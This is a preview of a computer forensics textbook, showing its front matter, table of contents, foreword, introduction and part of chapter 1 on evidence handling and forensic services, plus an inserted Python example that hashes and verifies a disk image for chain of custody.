Title: COMPUTER FORENSIC
Description: These are very clear notes to learn a subject. It is so easy, and it is very clearly written.
Document Preview
Computer Forensics
Second Edition
LIMITED WARRANTY AND DISCLAIMER OF LIABILITY
THE CD-ROM THAT ACCOMPANIES THE BOOK MAY BE USED ON A SINGLE PC ONLY
...
YOU FURTHER AGREE THAT THIS LICENSE GRANTS PERMISSION TO USE THE PRODUCTS CONTAINED HEREIN, BUT DOES NOT GIVE YOU RIGHT OF OWNERSHIP TO ANY OF THE CONTENT OR PRODUCT CONTAINED ON THIS CD-ROM
...
CHARLES RIVER MEDIA, INC
...
THE AUTHOR AND PUBLISHER HAVE USED THEIR BEST EFFORTS TO ENSURE THE ACCURACY AND FUNCTIONALITY OF THE TEXTUAL MATERIAL AND PROGRAMS CONTAINED HEREIN
...
THE SOFTWARE IS SOLD “AS IS” WITHOUT WARRANTY (EXCEPT FOR DEFECTIVE MATERIALS USED IN MANUFACTURING THE DISK OR DUE TO FAULTY WORKMANSHIP)
...
THIS INCLUDES, BUT IS NOT LIMITED TO, LOSS OF REVENUE OR PROFIT, OR OTHER INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OF THE PRODUCT
...
THE USE OF “IMPLIED WARRANTY” AND CERTAIN “EXCLUSIONS” VARIES FROM STATE TO STATE, AND MAY NOT APPLY TO THE PURCHASER OF THIS PRODUCT
...
Vacca
CHARLES RIVER MEDIA, INC
...
Published by Charles River Media, an imprint of Thomson Learning Inc
...
No part of this publication may be reproduced in any way, stored in a retrieval system of any type, or transmitted by any means or media, electronic or mechanical, including, but not limited to, photocopy, recording, or scanning, without prior permission in writing from the publisher
...
info@thomson
...
charlesriver
...
John R
...
Computer Forensics: Computer Crime Scene Investigation, Second Edition
...
Any omission or misuse (of any kind) of service marks or trademarks should not be regarded as intent to infringe on the property of others
...
Library of Congress Cataloging-in-Publication Data
Vacca, John R
...
Vacca
...
p
...
Includes bibliographical references and index
...
with cd-rom : alk
...
Computer security
...
Computer networks--Security measures
...
Forensic sciences
...
Title
...
9
...
8--dc22
2005007521
Printed in the United States of America
07 7 6 5 4 3
CHARLES RIVER MEDIA titles are available for site license or bulk purchase by institutions, user groups, corporations, etc
...
Requests for replacement of a defective CD-ROM must be accompanied by the original disc, your mailing address, telephone number, date of purchase and purchase price
...
CRM’s sole obligation to the purchaser is to replace the disc, based on defective materials or faulty workmanship, but not on the operation or functionality of the product
...
Contents
Acknowledgments  xix
Foreword  xxi
Introduction  xxv
Part I Overview of Computer Forensics Technology  1
1 Computer Forensics Fundamentals  3
  Introduction to Computer Forensics  4
  Use of Computer Forensics in Law Enforcement  8
  Computer Forensics Assistance to Human Resources/Employment Proceedings  9
  Computer Forensics Services  10
  Benefits of Professional Forensics Methodology  17
  Steps Taken by Computer Forensics Specialists  18
  Who Can Use Computer Forensic Evidence?  18
  Case Histories  24
  Case Studies  27
  Summary  28
  Chapter Review Questions and Exercises  31
  Hands-On Projects  33
  References  34
2 Types of Computer Forensics Technology  35
  Types of Military Computer Forensic Technology  36
  Types of Law Enforcement: Computer Forensic Technology  38
  Types of Business Computer Forensic Technology  52
  Specialized Forensics Techniques  57
  Hidden Data and How to Find It  61
  Spyware and Adware  61
  Encryption Methods and Vulnerabilities  63
  Protecting Data from Being Compromised  64
  Internet Tracing Methods  65
  Security and Wireless Technologies  69
  Avoiding Pitfalls with Firewalls  71
  Biometric Security Systems  72
  Summary  73
  Chapter Review Questions and Exercises  77
  Hands-On Projects  79
  References  81
3 Types of Computer Forensics Systems  83
  Internet Security Systems  84
  Intrusion Detection Systems  91
  Firewall Security Systems  99
  Storage Area Network Security Systems  108
  Network Disaster Recovery Systems  112
  Public Key Infrastructure Systems  113
  Wireless Network Security Systems  115
  Satellite Encryption Security Systems  118
  Instant Messaging (IM) Security Systems  125
  Net Privacy Systems  126
  Identity Management Security Systems  129
  Identity Theft  137
  Biometric Security Systems  141
  Homeland Security Systems  143
  Summary  145
  Chapter Review Questions and Exercises  148
  Hands-on Projects  150
  References  151
4 Vendor and Computer Forensics Services  153
  Occurrence of Cyber Crime  154
  Cyber Detectives  155
  Fighting Cyber Crime with Risk-Management Techniques  156
  Computer Forensics Investigative Services  162
  Forensic Process Improvement  167
  Course Content  176
  Case Histories  180
  Summary  182
  Chapter Review Questions and Exercises  184
  Hands-On Projects  186
  References  186
Part II Computer Forensics Evidence and Capture  189
5 Data Recovery  191
  Data Recovery Defined  191
  Data Backup and Recovery  192
  The Role of Backup in Data Recovery  200
  The Data-Recovery Solution  203
  Hiding and Recovering Hidden Data  206
  Case Histories  209
  Summary  212
  Chapter Review Questions and Exercises  214
  Hands-On Projects  216
  References  216
6 Evidence Collection and Data Seizure  217
  Why Collect Evidence?  217
  Collection Options  218
  Obstacles  218
  Types of Evidence  219
  The Rules of Evidence  220
  Volatile Evidence  223
  General Procedure  224
  Collection and Archiving  224
  Methods of Collection  225
  Artifacts  226
  Collection Steps  226
  Controlling Contamination: The Chain of Custody  228
  Reconstructing the Attack  229
  Summary  229
  Chapter Review Questions and Exercises  231
  Hands-on Projects  232
  References  233
7 Duplication and Preservation of Digital Evidence  235
  Preserving the Digital Crime Scene  238
  Computer Evidence Processing Steps  240
  Legal Aspects of Collecting and Preserving Computer Forensic Evidence  247
  Summary  252
  Chapter Review Questions and Exercises  254
  Hands-on Projects  255
  References  256
8 Computer Image Verification and Authentication  257
  Special Needs of Evidential Authentication  258
  Practical Considerations  264
  Practical Implementation  265
  Summary  268
  Chapter Review Questions and Exercises  271
  Hands-on Projects  273
  References  273
Part III Computer Forensics Analysis  275
9 Discovery of Electronic Evidence  277
  Electronic Document Discovery: A Powerful New Litigation Tool  278
  Summary  281
  Chapter Review Questions and Exercises  283
  Hands-on Projects  285
  References  285
10 Identification of Data  287
  Timekeeping  288
  Forensic Identification and Analysis of Technical Surveillance Devices  291
  Summary  297
  Chapter Review Questions and Exercises  299
  Hands-on Projects  300
  References  301
11 Reconstructing Past Events  303
  How to Become a Digital Detective  304
  Useable File Formats  305
  Unusable File Formats  305
  Converting Files  306
  Summary  309
  Chapter Review Questions and Exercises  310
  Hands-on Projects  312
  References  313
12 Networks  315
  Network Forensics Scenario  316
  A Technical Approach  316
  Destruction of Email  319
  Damaging Computer Evidence  321
  Tools Needed for Intrusion Response to the Destruction of Data  323
  System Testing  324
  Summary  326
  Chapter Review Questions and Exercises  328
  Hands-on Projects  330
  References  331
Part IV Countermeasures: Information Warfare  333
13 Fighting Against Macro Threats: Defensive Strategies for Governments and Industry Groups  335
  Is the U.S. Government Prepared for Information Warfare?  335
  Are Other Governments Prepared for Information Warfare?  339
  What Industry Groups Have Done to Prepare for Information Warfare  341
  Strategic Diplomacy and Information Warfare  344
  The Role of International Organizations  354
  The Role of Global Military Alliances  359
  Marshall Law and Cyberspace  361
  The Super Cyber Protection Agencies  363
  Summary  365
  Chapter Review Questions and Exercises  367
  Hands-on Projects  370
  References  370
14 The Information Warfare Arsenal and Tactics of the Military  371
  Overview of Military Tactics  376
  Offensive Ruinous IW Tools and Tactics  378
  Offensive Containment IW Tools and Tactics  380
  Defensive Preventive IW Tools and Tactics  384
  Defensive Ruinous IW Tools and Tactics  385
  Defensive Responsive Containment IW Tools and Tactics  386
  Countering Sustained Terrorist IW Tactics  389
  Dealing with Random Terrorist IW  394
  Summary  407
  Chapter Review Questions and Exercises  410
  Hands-on Projects  412
  References  413
15 The Information Warfare Arsenal and Tactics of Terrorists and Rogues  415
  The Terrorist Profile  421
  Why Terrorists and Rogues Have an Advantage in IW  424
  The Dark World of the Cyber Underground  430
  The Criminal Café in Cyberspace  433
  The Super Computer Literate Terrorist  438
  The New Security Professionals  440
  The Middle East Cyberwar  441
  The New Tools of Terrorism  444
  Why Tools Are Easy to Get and Use  452
  Why Nasty People Are So Hard to Track Down and Capture  453
  The IW Games  459
  Summary  462
  Chapter Review Questions and Exercises  465
  Hands-on Projects  467
  References  468
16 The Information Warfare Arsenal and Tactics of Private Companies  469
  Surviving Offensive Ruinous IW  476
  Surviving Offensive Containment IW  478
  Participating in Defensive Preventive IW Planning  480
  Benefiting from and Surviving Defensive Ruinous IW  482
  Benefiting from and Surviving Defensive Responsive Containment IW  484
  Protection Against Random Terrorist IW Tactics  487
  What to Do When Terrorists Keep Attacking  490
  Countering Sustained Rogue IW  492
  Protection Against Random Rogue IW  493
  Keeping the Amateur Rogue out of the Cyberhouse  501
  Summary  501
  Chapter Review Questions and Exercises  503
  Hands-on Projects  505
  References  506
17 The Information Warfare Arsenal of the Future  507
  Weapons of the Future  509
  The Global Positioning System  522
  Snoop, Sniff, and Snuff Tools  527
  Email Wiretaps Like Carnivore Can Steal Sensitive Correspondence  529
  IW Weapons of the Future  532
  Nanotechnology  538
  Summary  543
  Chapter Review Questions and Exercises  545
  Hands-on Projects  547
  References  547
18 Surveillance Tools for Information Warfare of the Future  549
  Monitoring Everything  549
  Cyber Surveillance  552
  The Cyber Footprint and Criminal Tracking  553
  The Implications of Cookies and Integrated Platforms  564
  Wintel Inside, or How Your Computer Is Watching You  566
  Data Mining for What?  569
  The Internet Is Big Brother  577
  The Wireless Internet: Friend or Foe?  579
  Summary  580
  Chapter Review Questions and Exercises  582
  Hands-on Projects  583
  References  584
19 Civilian Casualties: The Victims and Refugees of Information Warfare  585
  What the Cyber Masses Have to Lose  587
  The Destruction of Personal Assets in IWs  597
  Short- and Long-Term Personal Economic Impact on Cyber Citizens  601
  The Violation of Privacy During Information Wars  602
  The Individual Exposed  604
  Identity Theft  606
  Monitoring Private Affairs in Cyberspace  609
  The New Order and State Medical ID Cards  613
  Big Brother Is Here and Is Staying  616
  Summary  618
  Chapter Review Questions and Exercises  620
  Hands-on Projects  622
  References  623
Part V Advanced Computer Forensics Systems and Future Directions  625
20 Advanced Computer Forensics  627
  Advanced Encryption: The Need to Conceal  628
  Advanced Hacking  640
  Advanced Tracker Hackers  647
  The Problems of the Present  663
  Summary  666
  Chapter Review Questions and Exercises  669
  Hands-on Projects  670
  References  671
21 Summary, Conclusions, and Recommendations  673
  Summary  674
  Conclusions  681
  Recommendations  684
  Final Word: Computer Forensic Needs and Challenges  699
  Chapter Review Questions and Exercises  700
  References  703
Appendix A Frequently Asked Questions  705
  What Is Computer Forensics?  705
  Why Computer Forensics?  705
  What Is Data Recovery?  705
  Are There Instances When Data Cannot Be Recovered?  706
Appendix B Computer Forensics Resources  709
  General Forensics Resources  709
  Computer Crime  711
  File Formats and Extensions  711
  Cryptography and Steganography  712
Appendix C Links to Computer Forensics and Related Law Enforcement Web Pages  713
  Law Enforcement Links  713
  Organizations  714
  Mailing Lists  714
  USDOJ Guidelines for Searching and Seizing Computers  715
  Computer Forensic and Security Software Available Free of Charge to Law Enforcement Agencies  715
  Miscellaneous  715
Appendix D More Computer Forensics Cases  717
  Case Study 1: Lost Files  717
  Case Study 2: Corrupted Files  718
  Case Study 3: Disappearing Files  718
  Case Study 4: Computer Forensics  718
  Case Study 5: Forensic Accounting  719
  Case Study 6: Corporate Investigation into PC Pornography  719
  Case Study 7: Data Recovery  719
  Case Study 8: Industrial Espionage  720
  Case Study 9: Family Members Bolt  720
  Case Study 10: Former Employer  720
  Case Study 11: Goods Left to Rot  721
  Case Study 12: Managers Start New Company  721
  Case Study 13: Family Member Steals Clients  721
  Case Study 14: Erased Email  721
  Case Study 15: Bank Suspects  722
  Case Study 16: Former Managers  722
  Case Study 17: Former Catalog Designers  722
  Case Study 18: Model Pursued  722
  Case Study 19: Encrypted Mail  723
  Case Study 20: Two Attorneys Can’t Speak Civilly  723
  Case Study 21: Big Real Estate Deal  723
  Case Study 22: Doctor Accused  723
  Case Study 23: Former Employee Claims  724
  Case Study 24: Ex-Partner Claims  724
  Case Study 25: Former Manager  724
Appendix E Answers to Review Questions and Exercises, Hands-on Projects, Case Projects, and Optional Team Case Projects by Chapter  725
Appendix F Checklists by Chapter  747
Appendix G About the CD-ROM  781
Appendix H Glossary of Terms and Acronyms  791
Index  819
Acknowledgments
There are many people whose efforts on this book have contributed to its successful completion
...
A very special thanks to my publisher, David Pallai, without whose initial interest and support this book would not have been possible, for his guidance and encouragement over and above the business of being a publisher
...
Thanks to my copyeditor, Ruth Saavedra, whose fine editorial work has been invaluable
...
Finally, a special thanks to Michael Erbschloe, who wrote the Foreword for this book
...
Finally, I wish to thank the organizations and individuals who granted me permission to use the research material and information necessary for the completion of this book
...
Foreword
Criminals, fraudsters, and terrorists seem to strike whenever there is an opportunity
...
The FBI, through the Internet Crime Complaint Center (IC3), had received reports of Web sites being established purportedly to assist with collection and relief efforts
...
A fraudulent relief donation Web site has also been detected containing an embedded Trojan exploit which can infect the user’s computer with a virus if accessed
...
In WEB-SNARE, more than 150 investigations were successfully advanced, in which more than 150,000 victims lost more than $215 million
...
Many of the investigations included in WEB-SNARE could potentially be characterized as Identity Theft, or related to Identity Theft
...
In those initiatives, more than 200 investigations were coordinated among the various law enforcement agencies, resulting in arrests and/or charges of more than 250 individuals for engaging in a variety of cyber crimes including Identity Theft
...
Identifying such trends, as well as formulating an aggressive and proactive counter-attack strategy, remains a fundamental objective of the FBI’s Cyber Division
...
Once that information is obtained, they use their identities to post auctions on well-known auction sites
...
S and abroad, and the items sold are never delivered
...
The compromised e-commerce company was contacted via email by the hackers who demanded money to keep them from publicly posting the obtained information on the Internet
...
Through investigative efforts, these complaints were all linked to the hacking of the e-commerce company's system
...
Computer crimes are impacting society in numerous ways and there is a lot of work for the good guys
...
The soaring increase in the number of Internet users combined with the constant computerization of business processes has created new opportunities for computer criminals and terrorists
...
We need to train at least 100,000 more computer crime fighters in order to stem the global tide of computer attacks
...
My response has constantly been learn, study, train, and move forward
...
Computer Forensics is an excellent book for trained law enforcement personnel who desire to learn more about investigating and fighting computer crimes
...
It is also important that computer security personnel expand their understanding of forensic processes and keep their understanding of investigative and prevention procedures up to date
...
John Vacca has made an excellent contribution to the computer forensics field
...
Michael Erbschloe
Security Consultant and Author
St
...
Introduction
It has made little difference that the Bush administration pledged billions in additional federal funding to combat security breaches after the 9-11 terrorist attacks
...
Fortunately, the computer security field is also progressing at a brisk rate
...
GROWING PROBLEM
The numbers are chilling
...
So what’s going on? It doesn’t take a computer engineer or computer scientist to learn hacking fundamentals
...
Corporations and the federal government are just beginning to realize that securing their computer networks is critical
...
Colleges have finally started to offer courses and concentrations in computer security and forensics, but it remains difficult to find degree programs in these disciplines
...
The fascinating part of the science is that the computer evidence is often transparently created by the computer’s operating system without the knowledge of the computer operator
...
To find it, special forensic software tools and techniques are required
...
Industry, on the other hand, has been taking computer forensics seriously for several years
...
The problem is, industry doesn’t know which computer forensics issues to focus on
...
Academics are teaching the subjects, but most lack real-world experience, which is critical when training students
...
Times Are Changing
There’s an old saying, “If you wait long enough, it’s bound to change.”
...
Not only will more techies be concentrating on computer forensics, but also attorneys and judges will be taking courses in the subject
...
On the academic front, full-fledged degree tracks in computer forensics are being developed
...
Where are the jobs? Government agencies, such as the Department of Defense, FBI, CIA, NSA, and U.S. Postal Service need computer forensics specialists
...
On the corporate front, all companies (especially large and mid-size ones with a Web presence) will have serious computer forensics needs
...
PURPOSE
The purpose of this book is to show experienced (intermediate to advanced) computer forensics, security, and law enforcement professionals how to analyze and conduct a computer forensics examination and report the findings that will lead to the incarceration of the perpetrators
...
Through extensive hands-on examples (field and trial experiments) and case studies, you will gain the knowledge and skills required to master the deployment of information warfare countermeasures to thwart potential attacks
...
In addition to advanced computer forensics technology considerations in commercial organizations and governments, the book addresses, but is not limited to, the following line items as part of the discovery of electronic evidence:
The CD-ROM that accompanies this book contains the latest and best computer forensics software tools and documentation
...
Chapters on how to gain practical experience in analyzing the security risks and information warfare countermeasures that need to be addressed in your organization also include maintaining strong authentication and authenticity, preventing eavesdropping, retaining integrity of information, evaluating the strength of user passwords, selecting a firewall topology, and evaluating computer and hacker ethics
...
This new area of knowledge is now being researched, organized, and taught
...
TARGET AUDIENCE
With regard to computer forensics, the book is primarily targeted at those in government and law enforcement who require the fundamental skills to develop and implement security schemes designed to protect their organizations’ information from attacks, including managers, network and systems administrators, technical staff, and support personnel
...
ORGANIZATION OF THIS BOOK
This book is organized into six parts, including the appendixes (which include a glossary of computer forensic and information warfare terms)
...
Chapter 1, Computer Forensics Fundamentals, provides an overview of computer forensics types and techniques and their electronic evidence and capture
...
In other words, it covers security and computer evidence issues associated with Windows NT, Windows XP, and 2003
...
Answering the questions raised in this chapter will assist managers in creating sound corporate security policies and practices that support the following computer forensics systems: Internet security, intrusion detection, firewall security, storage area networks security, network disaster recovery, public key infrastructure security, wireless network security, satellite encryption security, instant messaging (IM) security, Net privacy, ID management security, ID theft prevention, biometric security, and homeland security
...
In addition, this chapter covers the following computer forensic services: forensic incident response, evidence collection, forensic analysis, expert witness, forensic litigation and insurance claims support, training, and forensic process improvement
...
Chapter 5, Data Recovery, answers many questions about the ins and outs of data recovery as it relates to computer forensics
...
Not everything is covered here—it should be used as a guide only, and you should seek further information for your specific circumstances
...
When it comes to computer evidence processing, Murphy is always looking over your shoulder
...
Chapter 8, Computer Image Verification and Authentication, discusses the overall security of a computer image verification and authentication system and how it rests with the combination of security measures
...
Chapter 9, Discovery of Electronic Evidence, addresses the process of information discovery
...
Chapter 10, Identification of Data, specifically focuses on the long-recognized value of deterrence—through threat of retaliation—as an effective means of defense
...
Chapter 11, Reconstructing Past Events, illustrates the reconstruction of past events with as little distortion or bias as possible
...
Network forensics is the principle of reconstructing the activities leading up to an event and determining the answer to “What did they do?” and “How did they do it?”
Part IV: Countermeasures: Information Warfare
Part IV discusses how to fight against macro threats (defensive strategies for governments and industry groups), the information warfare arsenal and tactics of the military, the information warfare arsenal and tactics of terrorists and rogues, the information warfare arsenal and tactics of private companies, the information warfare arsenal of the future, surveillance tools for information warfare of the future, and civilian casualties (the victims and refugees of information warfare)
...
Chapter 14, The Information Warfare Arsenal and Tactics of the Military, focuses on two goals
...
Second, you need to build a firm foundation on which you can make steady progress by continually raising the cost of mounting an attack and mitigating the expected damage of the information warfare arsenal and tactics of the military
...
Chapter 16, The Information Warfare Arsenal and Tactics of Private Companies, deals with the information warfare tools and strategies of private companies and how they’re used against the aggressors
...
Chapter 17, The Information Warfare Arsenal of the Future, discusses how the increasing dependence on sophisticated information systems brings with it an increased vulnerability to hostile elements, terrorists among them, in dealing with the information warfare arsenal of the future
...
Chapter 19, Civilian Casualties: The Victims and Refugees of Information Warfare, considers the application of civilian information operations (CIOs) to the conventional warfare environment
...
Part V: Advanced Computer Forensics Systems and Future Directions
Finally, Part V discusses advanced computer forensics, with a summary, conclusions, and recommendations
...
Chapter 21, Summary, Conclusions, and Recommendations
...
This final chapter is concerned with how to conduct a relevant and meaningful review of computer forensic analysis software tools
...
Finally, this chapter recommends the establishment of computer forensics standards for the exchange of digital evidence between sovereign nations and is intended to elicit constructive discussions regarding digital evidence
...
Appendix A is a list of frequently asked questions
...
Appendix C contains links to computer forensics and related law enforcement Web pages
...
Appendix E contains answers to review questions and exercises, hands-on projects, case projects, and optional team case projects by chapter
...
Appendix G contains all of the files that are on the CD-ROM
...
CONVENTIONS
This book uses several conventions to help you find your way around and to help you find important sidebars, facts, tips, notes, cautions, and warnings
...
They alert you to critical information and warn you about problems
...
Vacca
jvacca@hti
...
1 Computer Forensics Fundamentals
Electronic evidence and information gathering have become central issues in an increasing number of conflicts and crimes
...
However, for many years, law enforcement officers have been seizing data media and computers themselves, as they have become smaller and more ubiquitous
...
More recently, investigators have found ways of collecting evidence from remote computers to which they do not have immediate physical access, provided such computers are accessible via a phone line or network connection
...
These procedures form part of what is called computer forensics, though some people also use the term to include the use of computers to analyze complex data (for example, connections between individuals by examination of telephone logs or bank account transactions)
...
So, what actually is computer forensics? Computer forensics is about evidence from computers that is sufficiently reliable to stand up in court and be convincing
...
On the other hand, you may want one to criticize the work of others
...
INTRODUCTION TO COMPUTER FORENSICS
Computer forensics, also referred to as computer forensic analysis, electronic discovery, electronic evidence discovery, digital discovery, data recovery, data discovery, computer analysis, and computer examination, is the process of methodically examining computer media (hard disks, diskettes, tapes, etc.
...
A thorough analysis by a skilled examiner can result in the reconstruction of the activities of a computer user
...
Computer evidence can be useful in criminal cases, civil disputes, and human resources/employment proceedings
...
It’s also more difficult to completely remove information than is generally thought
...
Computer forensics, although employing some of the same skills and software as data recovery, is a much more complex undertaking
...
In computer forensics, the goal is to retrieve the data and interpret as much information about it as possible
...
Computer crime has forced the computer and law enforcement professions to develop new areas of expertise and avenues of collecting and analyzing evidence
...
The process of acquiring, examining, and applying digital evidence is crucial to the success of prosecuting a cyber criminal
...
To effectively combat cyber crime, greater emphasis must be placed in the computer forensic field of study, including but not limited to financial support, international guidelines and laws, and training of the professionals involved in the process, as well as the following subject matter:
Computer crime
The computer forensic objective
The computer forensic priority
The accuracy versus speed conflict
The need for computer forensics
The double tier approach
Requirements for the double tier approach
The computer forensics specialist
Computer Crime
According to industry analysts, there are currently 657 million people online worldwide
...
This represents a lot of data interchange
...
Computers can be involved in a wide variety of crimes including white-collar crimes, violent crimes such as murder and terrorism, counterintelligence, economic espionage, counterfeiting, and drug dealing
...
The Internet has made targets much more accessible, and the risks involved for the criminal are much lower than with traditional crimes
...
One hears of such technological crimes almost daily, thus creating a perception of lawlessness in the cyber world
...
Out of the 849 organizations that responded to the survey, 30% claimed theft of proprietary information, 23% reported sabotage of data or their networks, 35% experienced system penetration from an outside source, and 12% claimed financial fraud
...
Fifty-nine percent of the organizations involved in the survey reported employees having unauthorized access to corporate information
...
An alarming 74% of their workload is centered on white-collar crime
...
These are high-dollar crimes made easy by technology
...
As shown by this survey, computer crime is widespread and has infiltrated areas unimaginable just a few years ago
...
It is no doubt considerably higher today
...
Technology has brought this field of study to the forefront
...
A computer can be the target of the crime, it can be the instrument of the crime, or it can serve as an evidence repository storing valuable information about the crime
...
It can be the “smoking gun” serving as the instrument of the crime
...
For example, a hacker may use the computer as the tool to break into another computer and steal files, then store them on the computer
...
Applying information about how the computer was used in the crime also helps when searching the system for evidence
...
If the computer was the target of the crime, such as an intrusion, audit logs and unfamiliar programs should be checked
...
With the size of hard drives these days, it can take a very long time to check and analyze every piece of data a computer contains
...
The Computer Forensic Objective
The objective in computer forensics is quite straightforward
...
The key phrase here is useable as evidence in a court of law
...
The Computer Forensic Priority
Computer forensics is concerned primarily with forensic procedures, rules of evidence, and legal processes
...
Therefore, in contrast to all other areas of computing, where speed is the main concern, in computer forensics the absolute priority is accuracy
...
Accuracy Versus Speed
In this seemingly frenetic world where the precious resource of time is usually at a premium, pressure is heaped upon you to work as fast as possible
...
In computer forensics, as in any branch of forensic science, the emphasis must be on evidential integrity and security
...
Such guidelines do not encompass the taking of shortcuts, and the forensic practitioner accepts that the precious resource of time must be expended in order to maintain the highest standards of work
...
The computer forensics specialist will take several careful steps to identify and
attempt to retrieve possible evidence that may exist on a subject computer system:
Protect the subject computer system during the forensic examination from any possible alteration, damage, data corruption, or virus introduction
...
This includes existing normal files, deleted yet remaining files, hidden files, password-protected files, and encrypted files
...
Reveal (to the extent possible) the contents of hidden files as well as temporary or swap files used by both the application programs and the operating system
...
Analyze all possibly relevant data found in special (and typically inaccessible) areas of a disk
...
Print out an overall analysis of the subject computer system, as well as a listing of all possibly relevant files and discovered file data
...
Provide expert consultation and/or testimony, as required [2]
...
Criminal prosecutors use computer evidence in a variety of crimes where incriminating documents can be found: homicides, financial fraud, drug and embezzlement record-keeping, and child pornography
...
Insurance companies may be able to mitigate costs by using discovered computer evidence of possible fraud in accident, arson, and workman’s compensation cases
...
Law enforcement officials frequently require assistance in pre-search warrant preparations and post-seizure handling of the computer equipment
...
Individuals sometimes hire computer forensics specialists in support of possible claims of wrongful termination, sexual harassment, or age discrimination [2]
...
If the computer and its contents are examined (even if very briefly) by anyone other than a trained and experienced computer forensics specialist, the usefulness and credibility of that evidence will be tainted
...
There are an increasing number of people who claim to be experts in the field
...
There is far more to proper computer forensic analysis than the ability to retrieve data, especially when a criminal case is involved
...
The bottom line is that you will be retaining the services of an individual who will likely be called to testify in court to explain what he or she did to the computer and its data
...
Make sure you find someone who not only has the expertise and experience, but also the ability to stand up to the scrutiny and pressure of cross-examination
...
Computers can contain evidence in many types of human resources proceedings, including sexual harassment suits, allegations of discrimination, and wrongful termination claims
...
However, due to the ease with which computer data can be manipulated, if the search and analysis is not performed by a trained computer forensics specialist, it could likely be thrown out of court
...
An unfortunate concern today is the possibility that data could be damaged, destroyed, or misappropriated by a discontented individual
...
In this way, should the employee choose to do anything to that data before leaving, the employer is protected
...
This method can also be used to bolster an employer’s case by showing the removal of proprietary information or to protect the employer from false charges made by the employee
...
This includes situations where files have been deleted, disks have been reformatted, or other steps have been taken to conceal or destroy the evidence
...
Likewise, when people try to destroy incriminating evidence contained on a computer (from harassing memos to stolen technology), they leave behind vital clues
...
Thus, computer data evidence is quickly becoming a reliable and essential form of evidence that should not be overlooked
...
Your forensics professionals should be able to successfully perform complex evidence recovery procedures with the skill and expertise that lends credibility to your case
...
Your computer forensics experts, following federal guidelines, should act as this representative, using their knowledge of data storage technologies to track down evidence [3]
...
See Chapter 6, “Evidence Collection and Data Seizure,” for more detailed information
...
Your computer forensics experts should acknowledge both of these concerns by making an exact duplicate of the needed data
...
See Chapter 7, “Duplication and Preservation of Digital Evidence,” for more detailed information
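As an added example (not code from the book or from any vendor's tool), the following Python sketch shows two of the specialist's steps listed earlier in working form: producing and verifying an exact duplicate of the source media, and producing a hashed listing of the relevant files that can be re-checked later to support the chain of custody. The “drive” contents, the extracted file paths and the examiner name are constructed placeholders.

```python
"""Added example (not from the book): verify that a forensic image is an exact
duplicate of its source and keep a hashed file manifest for the chain of
custody.  All input below is constructed in memory; no real device is read."""
import hashlib
import io
from datetime import datetime, timezone

CHUNK = 1 << 16  # read 64 KiB at a time so multi-gigabyte images fit in memory


def stream_hash(stream, algorithms=("md5", "sha256")):
    """Return {algorithm: hexdigest} for the whole stream, computed in one pass."""
    hashers = {name: hashlib.new(name) for name in algorithms}
    stream.seek(0)
    while True:
        block = stream.read(CHUNK)
        if not block:
            break
        for h in hashers.values():
            h.update(block)
    return {name: h.hexdigest() for name, h in hashers.items()}


def hash_bytes(data):
    """Convenience wrapper for data already held in memory."""
    return stream_hash(io.BytesIO(data))


def image_device(source, destination):
    """Bit-for-bit copy of source into destination, then hash both.

    The copy is only usable as evidence when every digest matches; a mismatch
    means the image is not an exact duplicate and must be re-acquired."""
    source.seek(0)
    destination.seek(0)
    while True:
        block = source.read(CHUNK)
        if not block:
            break
        destination.write(block)
    destination.truncate()
    src, dst = stream_hash(source), stream_hash(destination)
    return {"source": src, "image": dst, "verified": src == dst}


def build_manifest(files, examiner):
    """One chain-of-custody record per file: path, size, digests, who and when.

    files: mapping of path -> bytes as extracted from the verified image."""
    taken = datetime.now(timezone.utc).isoformat(timespec="seconds")
    return [
        {
            "path": path,
            "size": len(data),
            "hashes": hash_bytes(data),
            "examiner": examiner,
            "hashed_at": taken,
        }
        for path, data in sorted(files.items())
    ]


def verify_manifest(manifest, files):
    """Re-hash every listed file; return the paths whose content no longer
    matches the manifest (altered, truncated or missing since acquisition)."""
    changed = []
    for entry in manifest:
        if hash_bytes(files.get(entry["path"], b"")) != entry["hashes"]:
            changed.append(entry["path"])
    return changed


def demo():
    """Constructed walk-through: image a 'drive', list extracted files, then
    show that a later modification of one file is detected."""
    drive = io.BytesIO(b"MBR" + b"\x00" * 509 + b"memo: confidential" * 40)
    result = image_device(drive, io.BytesIO())
    extracted = {  # constructed paths and contents, not from any real case
        "C:/Users/jdoe/memo.txt": b"memo: confidential\n",
        "C:/Users/jdoe/old.xls": b"\xd0\xcf\x11\xe0" + b"\x00" * 28,
    }
    manifest = build_manifest(extracted, examiner="examiner-1 (placeholder)")
    tampered = dict(extracted)
    tampered["C:/Users/jdoe/memo.txt"] = b"memo: nothing to see\n"
    return (result["verified"],
            verify_manifest(manifest, extracted),
            verify_manifest(manifest, tampered))


if __name__ == "__main__":
    print(demo())  # (True, [], ['C:/Users/jdoe/memo.txt'])
```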
...
The ability to recover lost evidence is made possible by the expert’s advanced understanding of storage technologies
...
Although the message is inaccessible to the user, your experts should be able to recover it and locate relevant evidence
...
Document Searches
Your computer forensics experts should also be able to search over 200,000 electronic documents in seconds rather than hours
...
Media Conversion
Some clients need to obtain and investigate computer data stored on old and unreadable devices
...
Expert Witness Services
Computer forensics experts should be able to explain complex technical processes in an easy-to-understand fashion
...
PROVIDE EXPERT CONSULTATION AND EXPERT WITNESS SERVICES
COMPUTERS
Expert Testimony
Has testified multiple times as an expert witness in computers and computer forensics in circuit court
Regularly testifies as an expert witness in computers and computer forensics in federal court for U.S. attorney’s offices
Computer Expertise
Belongs to the Computer Crime Investigators Association
Trained in the forensic examination of computers (PC & Mac), having conducted examinations in countless cases including child exploitation, homicide, militia, software piracy, and fraud
Has testified in state and federal courts as an expert in computers, computer forensics, the Internet, and America Online; often as an expert witness for U.S. attorney’s offices
Is thoroughly familiar with both computer hardware and software, having written software and repaired and assembled computers
Teaches computer crime investigation, including computer search and seizure, for the Institute of Police Technology and Management
Regularly consults with law enforcement officers in the search and seizure of computers
Has provided forensic training to numerous law enforcement officers and corporate security officers
Regularly consulted by other forensic examiners for advice in difficult cases
Training Given as Expert in Computer Crimes
Law Enforcement and Corrections Technology Symposium and Exhibition
Bureau of Justice Statistics/Justice Research Statistics Association
ELECTRONIC SURVEILLANCE
Theft by employees or others
Time
Property
Proprietary information and trade secrets
Embezzlement
Inappropriate employee actions
Burglary
